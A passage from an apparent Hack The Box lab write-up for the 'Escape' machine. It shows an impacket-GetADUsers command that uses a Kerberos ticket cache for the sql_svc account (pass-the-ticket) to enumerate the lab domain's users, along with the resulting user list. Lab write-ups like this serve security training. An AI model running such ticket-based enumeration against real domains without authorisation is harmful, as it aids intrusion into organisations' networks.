Username Extraction
Extracting domain users through thepass_the_ticket technique with the TGT of the svc_sql user
┌──(kali㉿kali)-[~/archive/htb/labs/escape]
└─$ KRB5CCNAME=sql_svc.ccache impacket-GetADUsers SEQUEL.HTB/sql_svc -dc-ip $IP -k -no-pass -all
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Querying DC for information about domain.
Name Email PasswordLastSet LastLogon
-------------------- ------------------------------ ------------------- -------------------
administrator 2022-11-18 22:13:16.520281 2023-08-13 03:17:37.111177
Guest <never> <never>
krbtgt 2022-11-18 18:12:10.132527 <never>
tom.henn 2022-11-18 22:13:12.991127 <never>
brandon.brown 2022-11-18 22:13:13.047440 <never>
ryan.cooper 2023-02-01 22:52:57.246550 2023-02-07 18:13:56.485457
sql_svc 2022-11-18 22:13:13.102329 2023-08-13 04:53:27.631875
james.roberts 2022-11-18 22:13:13.133415 <never>
nicole.thompson 2022-11-18 22:13:13.163173 <never> Those users matches the ones from the earlier extraction
saved to the users.txt file